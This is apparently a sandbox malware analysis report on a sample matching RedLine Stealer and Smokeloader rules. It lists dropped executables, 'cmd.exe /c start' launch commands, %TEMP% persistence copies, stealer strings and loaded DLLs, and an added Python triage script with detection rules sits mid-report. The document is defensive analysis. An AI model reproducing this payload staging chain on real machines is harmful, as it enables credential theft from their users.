Source: 00000000.00000002.2496144397.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2495938996.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000015.00000002.2718459013.000000000254D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2828820044.00000000026B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000022.00000002.2994271346.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe0.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9997331796448088
Source: random[1].exe.0.dr Static PE information: Section: hoxupgqj ZLIB complexity 0.9948139948104693
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: Section: ZLIB complexity 0.9997331796448088
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: Section: hoxupgqj ZLIB complexity 0.9948139948104693
Source: userAAKKKEBFCG.exe.0.dr Static PE information: Section: ZLIB complexity 0.9973124574250681
Source: userAAKKKEBFCG.exe.0.dr Static PE information: Section: zywzqxul ZLIB complexity 0.9946734005177514
Source: explorti.exe.5.dr Static PE information: Section: ZLIB complexity 0.9997331796448088
Source: explorti.exe.5.dr Static PE information: Section: hoxupgqj ZLIB complexity 0.9948139948104693
Source: axplong.exe.8.dr Static PE information: Section: ZLIB complexity 0.9973124574250681
Source: axplong.exe.8.dr Static PE information: Section: zywzqxul ZLIB complexity 0.9946734005177514
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@47/54@32/10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C737030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C737030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Q7H2EQ2W.htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4068:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6720
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5168
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7968
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4744
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2134857222.0000000022C85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2122596582.0000000022C69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe Virustotal: Detection: 42%
Source: RoamingIJEGHJECFC.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: userAAKKKEBFCG.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGHJECFC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGHJECFC.exe "C:\Users\user\AppData\RoamingIJEGHJECFC.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAAKKKEBFCG.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAAKKKEBFCG.exe "C:\Users\userAAKKKEBFCG.exe"
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 2376
Source: C:\Users\userAAKKKEBFCG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe "C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1332
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe "C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe "C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 1292
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe "C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2260 -parentBuildID 20230927232528 -prefsHandle 2204 -prefMapHandle 2196 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37ba41c5-ee86-4e0d-ae50-58ce2311310d} 3712 "\\.\pipe\gecko-crash-server-pipe.3712" 1b10486e910 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe "C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1036
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2200 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25350 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f4ac7dc-960f-42f4-ad8d-3d9c0af60b93} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 193b946bd10 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGHJECFC.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAAKKKEBFCG.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGHJECFC.exe "C:\Users\user\AppData\RoamingIJEGHJECFC.exe"
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAAKKKEBFCG.exe "C:\Users\userAAKKKEBFCG.exe"
Source: C:\Users\userAAKKKEBFCG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe "C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe "C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2260 -parentBuildID 20230927232528 -prefsHandle 2204 -prefMapHandle 2196 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37ba41c5-ee86-4e0d-ae50-58ce2311310d} 3712 "\\.\pipe\gecko-crash-server-pipe.3712" 1b10486e910 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2200 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25350 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f4ac7dc-960f-42f4-ad8d-3d9c0af60b93} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 193b946bd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
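The process-creation entries above are the part of this report an analyst turns into detection logic: a sample that uses cmd.exe /c start to launch binaries it dropped into the user profile, those binaries re-launching from random-named subdirectories of %TEMP%, a dropped binary opening Firefox on a URL, and WerFault reporting a crashed payload. The script below is an added example, not part of the Joe Sandbox report or any tool it names. It parses a handful of "Process created" lines copied from the report (the constructed sample list), rebuilds the parent/child tree, walks the lineage of the firefox.exe launch back to file.exe, and flags the four patterns just described. The rule names, the 10-character %TEMP% subdirectory heuristic and the user-writable path list are assumptions chosen for illustration.

```python
"""Process-tree triage over Joe Sandbox style "Process created" lines (added example)."""
import re
from collections import defaultdict

# Constructed sample input: "Process created" lines copied from the report above.
# The final "unknown unknown" line shows that entries without a resolvable child are skipped.
SAMPLE_LINES = [
    r'Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGHJECFC.exe"',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGHJECFC.exe "C:\Users\user\AppData\RoamingIJEGHJECFC.exe"',
    r'Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe "C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account',
    r'Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 2376',
    r'Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown',
]

# Child image paths may contain spaces, so the child group runs non-greedily up to the first ".exe ".
LINE_RE = re.compile(r'^Source: (?P<parent>.+?) Process created: (?P<child>.+?\.exe) (?P<cmdline>.*)$', re.I)
USER_WRITABLE = re.compile(r'^C:\\(Users|ProgramData)\\', re.I)        # assumption: "user-writable" roots
# Drop directory pattern seen in the report: a random 10-character name directly under %TEMP%.
TEMP_SUBDIR_EXE = re.compile(r'\\AppData\\Local\\Temp\\[0-9a-f]{10}\\[^\\]+\.exe$', re.I)
CMD_START = re.compile(r'/c\s+start\s+""\s+"(?P<target>[^"]+)"', re.I)
WERFAULT_PID = re.compile(r'-p\s+(?P<pid>\d+)')
BROWSERS = {'firefox.exe', 'chrome.exe', 'msedge.exe'}


def basename(path):
    return path.rsplit('\\', 1)[-1].lower()


def parse_events(lines):
    """One dict per parseable line: parent image, child image and the child's command line."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def build_tree(events):
    """parent image -> list of child images, in report order."""
    tree = defaultdict(list)
    for e in events:
        tree[e['parent']].append(e['child'])
    return dict(tree)


def lineage(events, proc):
    """Walk child -> parent links from proc back to the root (first parent seen wins; cycles are cut)."""
    parent_of = {}
    for e in events:
        parent_of.setdefault(e['child'], e['parent'])
    chain, seen = [proc], {proc}
    while chain[-1] in parent_of and parent_of[chain[-1]] not in seen:
        chain.append(parent_of[chain[-1]])
        seen.add(chain[-1])
    return chain


def analyze(events):
    """Flag the parent/child relationships a triage analyst would pull out of this report."""
    findings = []

    def flag(rule, e, detail):
        findings.append({'rule': rule, 'parent': e['parent'], 'child': e['child'], 'detail': detail})

    for e in events:
        child, cmd = basename(e['child']), e['cmdline']
        # 1. cmd.exe /c start "" "<exe>" is a launcher idiom for dropped payloads; flag it when the
        #    target lives in a user-writable location rather than under Program Files or Windows.
        if child == 'cmd.exe':
            m = CMD_START.search(cmd)
            if m and USER_WRITABLE.match(m.group('target')):
                flag('cmd_start_user_path', e, m.group('target'))
        # 2. Executable running from a random-named subdirectory of %TEMP% (persistence copy).
        if TEMP_SUBDIR_EXE.search(e['child']):
            flag('temp_subdir_exec', e, e['child'])
        # 3. A binary in the user profile launching a browser with a URL on the command line.
        if child in BROWSERS and USER_WRITABLE.match(e['parent']) and 'http' in cmd.lower():
            flag('browser_spawned_by_user_binary', e, cmd)
        # 4. WerFault for a user-profile binary: the payload crashed; -p carries the crashed PID.
        if child == 'werfault.exe' and USER_WRITABLE.match(e['parent']):
            m = WERFAULT_PID.search(cmd)
            flag('werfault_for_user_binary', e, 'crashed pid ' + (m.group('pid') if m else '?'))
    return findings


if __name__ == '__main__':
    evs = parse_events(SAMPLE_LINES)
    for f in analyze(evs):
        print(f"{f['rule']:32} {basename(f['parent'])} -> {basename(f['child'])}: {f['detail']}")
    print(' <- '.join(basename(p) for p in lineage(evs, r'C:\Program Files\Mozilla Firefox\firefox.exe')))
```

On the sample the lineage walk shows firefox.exe sitting five hops below file.exe (file.exe > cmd.exe > RoamingIJEGHJECFC.exe > explorti.exe > 8e8f4571c5.exe > firefox.exe), which is the relationship an EDR query should key on: the browser's parent is a binary in %TEMP%, not explorer.exe. The same four rules port directly to Sysmon event ID 1 or the equivalent EDR telemetry, where the parent image and command line are available as separate fields.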
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: windows.storage.dll
